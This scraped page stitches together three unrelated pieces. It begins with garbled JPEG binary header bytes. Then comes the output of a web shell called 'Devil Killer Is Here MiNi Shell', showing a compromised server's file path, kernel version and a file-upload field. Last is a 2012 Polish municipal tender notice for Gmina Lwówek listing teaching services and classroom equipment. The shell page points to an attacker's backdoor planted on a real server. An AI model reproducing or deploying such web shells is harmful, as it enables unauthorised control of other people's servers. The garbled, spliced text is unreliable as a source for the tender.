JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120810/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120810/296360-N-2012.html

<p class="kh_header"><b>Lwówek: Świadczenie usługi edukacyjnej w projekcie o tytule pn.: Indywidualizacja nauczania klas I-III w gminie Lwówek w roku szkolnym 2012/2013.
Numer sprawy RG.271.10.01.2012.ZJ</b><br>
<b>Numer ogłoszenia: 296360 - 2012; data zamieszczenia: 10.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lwówek , ul. Ratuszowa 2, 64-310 Lwówek, woj. wielkopolskie, tel. 061 4414024, faks 061 4414212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lwowek.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi edukacyjnej w projekcie o tytule pn.: Indywidualizacja nauczania klas I-III w gminie Lwówek w roku szkolnym 2012/2013.
Numer sprawy RG.271.10.01.2012.ZJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja zamówienia obejmuje świadczenie usług rozumianych jako przeprowadzanie specjalistycznych zajęć edukacyjnych wspierających indywidualizację procesu dydaktycznego, na poziomie właściwym dla nauczania w szkołach podstawowych w klasach I - III. 
Celem głównym projektu jest wyrównywanie szans edukacyjnych oraz rozwinięcie zainteresowań poprzez indywidualizację procesu kształcenia dzieci z klas I - III w 100% szkół podstawowych funkcjonujących na terenie gminy Lwówek, tj.: SP w Brodach, SP w Chmielniku, SP w Grońsku, SP w Lwówku, SP w Pakosławiu, SP w Posadowie oraz SP w Zębowie w terminie od 1 IX 2012 r. do 30 VI 2013 r.
Cele szczegółowe projektu to:
- Zapewnienie dziecku realizującemu I etap edukacyjny w szkołach podstawowych funkcjonujących na terenie gminy Lwówek oferty edukacyjno-wychowawczo-profilaktycznej zgodnej z jego indywidualnymi potrzebami i możliwościami edukacyjnymi i rozwojowymi w terminie od 1 IX 2012 r. do 30 VI 2013 r.
- Zmniejszenie dysproporcji edukacyjnych i rozwojowych uczniów i uczennic szkół z gminy Lwówek poprzez udział w zajęciach dodatkowych w terminie od 1 IX 2012 r. do 30 VI 2013 r. 
- Stworzenie odpowiednich warunków indywidualnej pracy nauczyciela z uczniem w szkołach podstawowych objętych wsparciem poprzez doposażenie szkół w materiały dydaktyczne w r. szk. 2012/2013.
Uwagi Zamawiającego:
1. Projekt będzie realizowany po podpisaniu umowy z Wojewódzkim Urzędem Pracy, natomiast płatności za wykonywane usługi wynikające z umowy dokonywane będą po otrzymaniu środków na ww zadanie.                                                                                                                                                                 2. Umowa Zamawiającego z wybranym Wykonawcą zostanie podpisana po przyjęciu środków do budżetu Gminy Lwówek na 2012r.
3.W przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia Zamawiający przewiduje unieważnienie postępowania o udzielenie zamówienia.  
4. Jeżeli w przedmiotowej dokumentacji przetargowej na okoliczność świadczenia usługi edukacyjnej  zostały przedstawione wskazania - nazwy pomocy dydaktycznych, lub znaki towarowe i materiały    wskazujące na konkretnego producenta (Wykonawcę), należy traktować je jako przykładowe, ze względu na zasady ustawy Prawo zamówień publicznych art. 29.                                                                            Oznacza to, że Wykonawcy mogą na etapie postępowania przetargowego zaproponować inne materiały i rozwiązania, z zachowaniem odpowiednich,tj. równoważnych - nie gorszych niż wskazane o  parametrach edukacyjnych  dla osiągnięcia oczekiwanej indywidualizacji nauczania klas I-III w gminie Lwówek, z zapewnieniem uzyskania przez Wykonawcę i na jego koszt wszelkich ewentualnych uzgodnień i opinii na temat przyjętych przez siebie materiałów, pomocy dydaktycznych  i rozwiązań w celu wykazania, że przyjęte przez Wykonawcę materiały, pomoce dydaktyczne i rozwiązania spełniają warunki Zamawiającego w  specyfikacji istotnych warunków zamówienia.                                                                                                                                   

W zajęciach z beneficjentami  poruszona zostanie kwestia  zasady równością szans kobiet i mężczyzn w życiu społecznym. Bezpośrednim realizatorem usługi (nauczycielem) z ramienia Wykonawcy (doświadczonej firmy szkoleniowej) będzie osoba, która posiada wykształcenie kierunkowe oraz praktykę.
1. Szczegółowy opis przedmiotu zamówienia - zespół nauczycieli, zatrudnionych przez wykonawcę, stworzy program indywidualizacji (na podstawie właściwych założeń projektowych) obejmujący tematykę następujących edukacyjnych zajęć dodatkowych:

a.	Zajęcia dla uczniów ze specyficznymi trudnościami w czytaniu i pisaniu:
- Ilość godzin - 1009h łącznie dla wszystkich grup,
- Ilość grup - 17
- SP w Brodach 2 gr. 5-osobowe - 66 h,
- SP w Chmielniku 2 gr. (5 i 4)-osobowe - 80 h,
- SP w Grońsku 1 gr. 4-osobowa - 80 h,
- SP w Lwówku 3 gr. 4-osobowe - 73 h,
- SP w Pakosławiu 2 gr. 4-osobowe - 60 h,
- SP w Posadowie 3 gr. (6 i 5)-osobowe - 50 h,
- SP w Zębowie 4 gr. (7 i 6)-osobowe - 37 h,
- Termin realizacji 
- 1009h od dnia podpisania umowy do VI 2013 r.

b.	Zajęcia dla uczniów z trudnościami w matematyce:
- Ilość godzin - 676h łącznie dla wszystkich grup,
- Ilość grup - 12
- SP w Brodach 2 gr. 5-osobowe - 66 h,
- SP w Grońsku 1 gr. 4-osobowa - 80 h,
- SP w Lwówku 2 gr. 4-osobowe - 73 h,
- SP w Pakosławiu 1 gr. 5-osobowa - 60 h,
- SP w Posadowie 3 gr. (5 i 4)-osobowe - 50 h,
- SP w Zębowie 3 gr. (9 i 8)-osobowe - 36 h,
- Termin realizacji 
- 676h od dnia podpisania umowy do VI 2013 r.
c.	Zajęcia logopedyczne:
- Ilość godzin - 400h łącznie dla wszystkich grup,
- Ilość grup - 6
-SP w Brodach 1 gr. 4-osobowa - 70 h,
- SP w Chmielniku 1 gr. 4-osobowa - 80 h,
- SP w Lwówku 2 gr. 2-osobowe - 70 h,
- SP w Pakosławiu 2 gr. 3-osobowe - 55 h,
- Termin realizacji 
- 400h od dnia podpisania umowy do VI 2013 r.

d.	Zajęcia dla uczniów szczególnie uzdolnionych:
- Ilość godzin - 404h łącznie dla wszystkich grup,
- Ilość grup - 7
- SP w Chmielniku 1 gr. 5-osobowa - 80 h,
- SP w Grońsku 1 gr. 4-osobowa - 80 h,
- SP w Lwówku 2 gr. 4-osobowe - 70 h,
- SP w Posadowie 1 gr. 5-osobowa - 30 h,
- SP w Zębowie 2 gr. 6-osobowe - 37 h,
- Termin realizacji 
-404h od dnia podpisania umowy do VI 2013 r.

Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia poinformuje Zamawiającego (na piśmie lub osobiście - spotkanie plenarne) o autorskim programie i koncepcji przeprowadzenia zajęć. 
Zaleca się, aby oferent dokonał wizji lokalnej na terenie objętym zakresem rzeczowym zadania oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty. 
Za wypadki i szkody powstałe podczas usługi odpowiada wykonawca. Odpowiedzialność cywilną wobec osób trzecich jak i z tytułu zdarzeń losowych przyjmuje na siebie wykonawca.

Wykonawca dostarczy następujące pomoce dydaktyczne przewidziane do zakupu w budżecie projektu, na rzecz prawidłowej realizacji przedmiotu zamówienia:

(rzeczy te przeznaczone są dla dzieci ze szkół podstawowych do zajęć edukacyjnych - powinny zatem uwzględniać wiek dzieci, klasy I - III SP; powinny posiadać także odpowiednie atesty i certyfikaty zgodności z europejskimi normami oraz być w 100% bezpieczne dla dzieci - beneficjentów ostatecznych w projekcie. W związku z tym, że w budżecie projektu, w większości przypadków, są one podane z nazwy, Zamawiający na podst. art. 29 ust. 3 podaje ich nazwę własną dodając wyraz lub równoważny lub samą nazwę opisową)

1. Doposażenie bazy dydaktycznej SP w Brodach:
- dostawa pomocy dydaktycznych:
- Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6 cala, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220 lub równoważny, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) - 1 sztuka,
- Pomoc dydaktyczna -Wyprawka pierwszoklasisty - Paleta - lub równoważna; zawiera zestaw kontrolny: okrągłą, drewnianą podstawę z 12 drewnianymi klockami w 6 kolorach, 2 tarcze blanco oraz 12 tematycznych tarcz ze zbiorem zabaw w formie obrazkowej - 1 sztuka,
- Pomoc dydaktyczna - Łamigłówki słowne - lub równoważna; drewniane kosteczki z literkami, z których można układać słówka (na podstawie z kratką), 145 szt. o wym. 1,1 x 1,1 cm, podstawa o wym. 18 x 18 cm - 1 sztuka,
- Pomoc dydaktyczna - Skoncentruj się cz. 1 - lub równoważna; format: 16,8 x 23,5 cm, 32 str. wykorzystywane z zestawem kontrolnym PUS - 1 sztuka,
- Pomoc dydaktyczna  - Skoncentruj się cz. 2 - lub równoważna; format: 16,8 x 23,5 cm, 32 str. wykorzystywane z zestawem kontrolnym PUS - 1 sztuka,
- Pomoc dydaktyczna  - Tarcze ćwiczeń M1- lub równoważna; komplet 12 tarcz ćwiczeń do - Palety -, obejmujących podstawowe działania arytmetyczne - 3 sztuki,
- Pomoc dydaktyczna  - Sudoku - lub równoważna; wymiary opakowania: 28 x 27 x 6 cm - 2 sztuki,
- Pomoc dydaktyczna - Bingo - dodawanie i odejmowanie do 20 - lub równoważna; 2 zestawy po 6 kart (dodawanie - kolor pomarańczowy i odejmowanie - kolor jasnozielony), 108 kartoników z działaniami (dodawanie - kolor czerwony i odejmowanie - kolor zielony) - 1 sztuka,
- Pomoc dydaktyczna - Bingo - dodawanie i odejmowanie do 100 - lub równoważna; 2 zestawy po 6 kart (dodawanie i odejmowanie), 108 kartoników z działaniami - 1 sztuka,
- Pomoc dydaktyczna  - Bingo - mnożenie i dzielenie do 100 - lub równoważna; 2 zestawy po 6 kart (mnożenie i dzielenie), 108 kartoników z działaniami - 1 sztuka,
- Pomoc dydaktyczna  - Bingo - mnożenie i dzielenie do 20 - lub równoważna; 2 zestawy po 6 kart (mnożenie i dzielenie), 108 kartoników z działaniami - 1 sztuka,
- Pomoc dydaktyczna  - Gimnastyka buzi i języka - lub równoważna; IV zestawy po 10 kart, wymiary: A5 lub 9 x 9 cm, jedna strona karty zawiera jasny, czytelny symbol, druga strona karty jest kolorowa - jeden kolor - lub biała - 1 sztuka,
- Pomoc dydaktyczna  - Słowa i zdania - lub równoważna; pomoc składa się z 22 kart A4 i wzorów do budowy zdań o różnej długości, każda karta podzielona jest na dwie części - 1 sztuka,
- Pomoc dydaktyczna  - Sylaby w dominie - lub równoważna; zawartość: 56 kostek domina, klepsydra, worek, 16 żetonów, karta wyrazów, instrukcja - 1 sztuka,
- Pomoc dydaktyczna  - Loguś - komputerowe gry logopedyczne - lub równoważna; zestaw 4 gier komputerowych: Patrzę i mówię - głoski: Labiogram-Głoska i Głoska-Labiogram, Patrzę i mówię - wyrazy: Labiogramy-Wyraz i Wyraz-Labiogramy - 1 sztuka,
- Pomoc dydaktyczna  - Multimedialny pakiet logopedyczny. Część I - sz, ż, cz, dż - lub równoważna; pakiet składa się z: 1. Programu komputerowego na płycie CD (Płyta CD-ROM zawiera 5 multimedialnych programów komputerowych wspomagających terapię wymowy głosek - sz, ż, cz, dż). 2. Poradnika metodycznego, 3. Zeszytu ćwiczeń - 1 sztuka. 

2. Doposażenie bazy dydaktycznej SP w Chmielniku:
- dostawa pomocy dydaktycznych:
- Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6 cala, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220 lub równoważny, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) - 1 sztuka,
- Pomoc dydaktyczna  - Układ planet - lub równoważna; system planetarny - 9 planet: Merkury, Venus, Ziemia, Mars, Jowisz, Saturn, Uran, Neptun i Pluton,
sterowanie - na baterie, lektor w języku angielskim - opis każdej planety - 1 sztuka,
- Pomoc dydaktyczna  - Mikroskop szkolny z mikro i makro regulacją - lub równoważna; statyw kołyskowy połączony przegubem z podstawą, podstawa podkówka z trzema punktami podparcia, głowica okularowa jednooczna, obrotowa diafragma pięciozakresowa, obiektywy achromatyczne: 4x, 10x, 40x (S)(obiektyw amortyzowany), okular: H10x, H16x, zakres powiększeń w skompletowaniu standardowym 40x- 640x, makroruchy: 50 mm, mikroruchy: 1.4-1.6 mm, długość mechanizmu tubusu - 160 mm, miska rewolwerowa trójgniazdowa, oświetlenie preparatu przy użyciu lampy lub lusterka, stolik płaski z łapkami do mocowania preparatu, całość w drewnianej walizce - 2 sztuki,
- Pomoc dydaktyczna  - Małpie opowieści - lub równoważna; seria 5 gier przygodowo-zręcznościowych:  - Królewna Sundary - , - Muzeum Rozmaitości - , - Opactwo Aviath -,  - Dolina Szakala - ,  - Zamek Drakoniona - 5 sztuk (po jednej sztuce każdej części),
- Pomoc dydaktyczna  - Program multimedialny dla klas I-III (2 części) - zaproponowane przez wykonawcę - 2 sztuki (po jednej sztuce każdej części),
- Pomoc dydaktyczna - Karty logopedyczne Piotruś - pakiet I - lub równoważna; pakiet 8 talii kart o wym. 5,3 x 8,5 cm, głoski sz, ż/rz, cz, dż, s, z, c, dz - 1 sztuka,
- Pomoc dydaktyczna - Karty logopedyczne Piotruś - pakiet II - lub równoważna; pakiet 8 talii kart o wym. 5,3 x 8,5 cm, głoski ś, ź, ć, dź, l, l-r, r, t-r - 1 sztuka,
- Pomoc dydaktyczna  - Zwierzaki - logopedyczna gra komputerowa - lub równoważna; program logopedyczny na płycie CD, opracowany jako multimedialna, interaktywna prezentacja, zawiera zagadki, ćwiczenia, piosenki do wspólnego śpiewania i kolorowania - 1 sztuka,
- Pomoc dydaktyczna - Chcę zostać - 4 zestawy puzzli logopedycznych -  lub równoważna; układanka zawiera 4 zestawy puzzli dla najmłodszych przedstawiające 4 zawody: strażak, policjant, fryzjerka, kwiaciarka, każdy z obrazków składa się z 6 puzzli - 1 sztuka,
- Pomoc dydaktyczna  - Literkowy wyścig - gra logopedyczna - lub równoważna; zawartość: 14 kart z obrazkami, 60 żetonów z literami, 20 żetonów plastikowych, instrukcja - 1 sztuka,

3. Doposażenie bazy dydaktycznej SP w Grońsku:
- dostawa pomocy dydaktycznych:
- Dostawa komputera stacjonarnego(dwurdzeniowy procesor Intel, 2 GB pamięci operacyjnej DDR3, dysk twardy 500 GB, 7200 obr./min, SATA 3 Gb/s, nagrywarka DVD, zintegrowana karta graficzna, dźwiękowa i sieciowa GigaEthernet, obudowa Small Form Factor, klawiatura (w kolorze obudowy komputera) i mysz optyczna - obie USB, oprogramowanie: Windows 7 Home Premium; sterowniki i programy obsługi do urządzeń i podzespołow obecnych w komputerze) - 1 sztuka,
- Pomoc dydaktyczna  - Monitor płaski - (przekątna: 19 cali, rozdzielczość: 1440 x 900, format obrazu: 16:9, kontrast: 50 000:1, czas reakcji: 5 ms, szerokość 440 mm, waga: 5 kg) - 3 sztuki.

4. Doposażenie bazy dydaktycznej SP w Lwówku:
- dostawa pomocy dydaktycznych:
- Pomoc dydaktyczna  - Tablica interaktywna - (parametry techniczne: przekątna tablicy 63 cala, przekątna powierzchni roboczej 57,5 cala, technologia elektromagnetyczna, powierzchnia matowa, suchościeralna, obsługa  poprzez pióro bezprzewodowe, możliwość pisania dwoma piórami jednocześnie, format obrazu 4:3, rozdzielczość rzeczywista 59000 x 42750, dokładność odczytu 50 linii/mm, komunikacja poprzez USB, pasek skrótów na tablicy, wymiar tablicy 1280x 955mm, powierzchnia robocza 1180x 855mm, waga tablicy do 11kg, system operacyjny Windows 2000/XP/Vista/732 bit i 64 bit) lub równoważna - 1 sztuka,
- Pomoc dydaktyczna - Gry edukacyjne - zaproponowane przez wykonawcę - 2 sztuki,

5. Doposażenie bazy dydaktycznej SP w Pakosławiu:
- dostawa pomocy dydaktycznych:
- Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6 cala, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220 lub równoważny, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) - 1 sztuka,
- Pomoc dydaktyczna  - Aparat fotograficzny - (matryca CCD o rozdzielczości 16.1 mln pikseli, szerokokątny obiektyw z 5-krotnym zoomem optycznym, 2.7-calowy ekran LCD, filmowanie w jakości HD, tryb Sweep Panorama, inteligentny tryb automatyczny, optyczna stabilizacja obrazu, pamięć: MS Duo, MS PRO Duo, MS PRO Duo High Speed, MS PRO-HG Duo, SD, SDHC, SDXC) - 1 sztuka,
- Pomoc dydaktyczna  - Super pakiet edukacyjny - lub równoważna; pakiet zawiera 10 programów komputerowych (w sumie ponad 1200 ćwiczeń). W skład zestawu wchodzą następujące programy: Doskonalenie umiejętności czytania (199 ćw, w tym ćwiczenie słuchu fonemowego, które jest niedostępne w wersji sprzedawanej w marktech itp.), Spółgłoski miękkie (77 ćw.), Dysortografia (348 ćw. , ó/u, rz/ż, ch/h, ćwiczenia na materiale niewyrazowym ), Pisownia ĄĘ cz. I (134 ćw.), Pisownia ĄĘ cz. II (137 ćw.), Lista wyrazów z  - ó -  niewymiennym (72 ćw.), Lista - rz - na początku wyrazu (57 ćw.), Lista  - rz - w środku wyrazu (67 ćw.), Lista  - rz - na końcu wyrazu (68 ćw.), Podstawy matematyki wczesnoszkolnej i tabliczki mnożenia (53 ćw.) - 1 zestaw,
- Pomoc dydaktyczna - Pomoce utrwalające poprawną wymowę - zaproponowane przez wykonawcę - 1 sztuka,
- Pomoc dydaktyczna  - Logopedyczny labirynt - lub równoważna; duża tablica magnetyczna z drewnianą ramką przeznaczona do układania na niej drewnianych elementów podklejonych taśmą magnetyczną, 3 piłki (metalowa, drewniana i do tenisa stołowego), wym. planszy 45 x 32 x 20 cm, 20 drewnianych elementów, 100 słomek - 1 sztuka,
- Pomoc dydaktyczna  - Logopedyczny pakiet do diagnozy i terapii logopedycznej - lub równoważna; pakiet podstawowy zawiera: 1) 5 programów do diagnozy i terapii logopedycznej: Szereg szumiący, Szereg syczący, Szereg ciszący, Różnicowanie szeregów, Głoska r 2) Aplikację logopedy, 3) Profesjonalny mikrofon - 1 sztuka,
- Pomoc dydaktyczna  - Gry dydaktyczne - zaproponowane przez wykonawcę - 1 zestaw,
- Pomoc dydaktyczna  - Puszki dźwiękowe - lub równoważna; drewniane puszki z uchwytami, które wydają różne tony dźwięków, podstawa o wym. 30 x 16 x 2 cm, 8 szt. puszek o wym. 6 x 6 x 4 cm - 1 zestaw,
-Pomoc dydaktyczna  - Test artykulacyjny - lub równoważna; zawiera 84 kolorowe ilustracje drukowane na kartonie formatu A5 laminowane. 
- materiał obrazkowy, podręcznik, karty badań, omówienie założeń teoretycznych - 1 sztuka,
- Pomoc dydaktyczna  - Wibrator z łopatkami - lub równoważna; zestaw zawiera 2 łopatki (miękką i twardą) - 1 sztuka,
Pomoc dydaktyczna  - Torba małego muzyka - lub równoważna;  tamburyn o śr. 20 cm, maxi quiro z pałeczką, dł. 40 cm, podwójna tarka quiro z pałeczką, dł. 27 cm, 5 trójkątów z pałeczkami o wym. 20,5 cm, 17,5 cm, 15,5 cm, 13 cm, 10,5 cm., kastaniety drewniane 1 para, śr. 5,5 cm, kastaniety z rączką 1 szt., 21 cm, marakasy drewniane 1 para, dł. 23 cm, drewniany tonblok, dł. 20 cm, śr. 4,5 cm, tamburyn z membraną, śr. 20 cm, podwójny tonblok z pałeczką, wym. 20 cm, śr. 4,5 cm, podwójny tonblok mały z pałeczką, wym. 20 cm, śr. 3,5 cm, klawesy 1 para, dł. 20 cm, śr. 2,2 cm, marakas wałek, dł. 20,5 cm, śr. 5 cm, wym. torby po złożeniu 42 x 42 cm, wszystkie instrumenty umieszczone w praktycznej torbie z kieszonkami - 1 zestaw,
- Pomoc dydaktyczna  - Gra Pim-Pam - lub równoważna; opakowanie zawiera: 3 dwustronne plansze z obrazkami, koło do losowania literek, instrukcja - 1 sztuka,

6. Doposażenie bazy dydaktycznej SP w Posadowie:
- dostawa pomocy dydaktycznych:
- Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6 cala, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220 lub równoważny, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) - 1 sztuka,
- Pomoc dydaktyczna  - Domino wyrazowe - dwusylabowe - lub równoważna; zestaw sylab do tworzenia 17 prostych słów, 34 kartoniki o wym. 4 x 8 cm - 1 sztuka,
- Pomoc dydaktyczna  - Kto to? Co to? Rzeczownik - lub równoważna; pomoc składa się z 5 plansz A4, 30 kartoników z obrazkami (6 x 6 cm) oraz 5 kart pracy A4 (do kserowania) - 1 sztuka,
- Pomoc dydaktyczna  - Czasownik - Co robi? Co się z nim dzieje? - lub równoważna; 136 kartoników z obrazkami czynności (wym. 6 x 6 cm), plansza czasu A4, 2 plansze do ćw. odmiany czasownika przez osoby (A4), 5 kontrolnych kart pracy do kserowania (A4) - 1 sztuka,
- Pomoc dydaktyczna - Obrazkowa matematyka - liczmany, cyfry, znaki magnetyczne -  lub równoważna; zawartość: 140 liczmanów (14 wzorów po 10 sztuk każdy: jabłka, gruszki, babany, krowy, konie, psy, koty, balony, samochody, rowery, statki, samoloty, dziewczynki i chłopcy) - 42 tafelki z liczbami 0-20 (po 2 sztuki) - 14 tafelków ze znakami: +, -, x, :, =, <, > (po 2 sztuki) - wymiar tafelków 5,3 x 5,3 cm - wymiar obrazków ok. 13 cm - elementy wykonane z laminowanego PCV podklejonego folią magnetyczną - 1 zestaw,
- Pomoc dydaktyczna  - Woreczki z cyferkami - lub równoważna; wyszywane cyferki od 1 do 12 pozwala na tworzenie wielu wariantów gier, wym. 8 x 12 cm, 12 szt. - 1 komplet,
- Pomoc dydaktyczna - Liczydło uczniowskie - lub równoważna; długość 32 cm, średnica korali 1,1 cm - 1 sztuka,
- Pomoc dydaktyczna  - Dwustronny termometr -  lub równoważna; dwustronny termometr w obudowie z tworzywa, długość 51 cm - 1 sztuka,
- Pomoc dydaktyczna  - Skały i minerały - lub równoważna; zestaw 50 skał i minerałów do ćwiczeń geologicznych, każdy oznaczony jest kodem, a całość umieszczona w drewnianej skrzyneczce - 1 zestaw,
- Pomoc dydaktyczna - Globus fizyczny - lub równoważna; średnica kuli 320 mm - 1 sztuka,
- Pomoc dydaktyczna  - Mapa fizyczna Polski - lub równoważna; dwustronna, wielkoformatowa, skala 1: 500 000,  rozmiar: 160 cm x 140 cm - 1 sztuka,

7. Doposażenie bazy dydaktycznej SP w Zębowie:
- dostawa pomocy dydaktycznych:
- Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6 cala, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220 lub równoważny, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) - 1 sztuka,
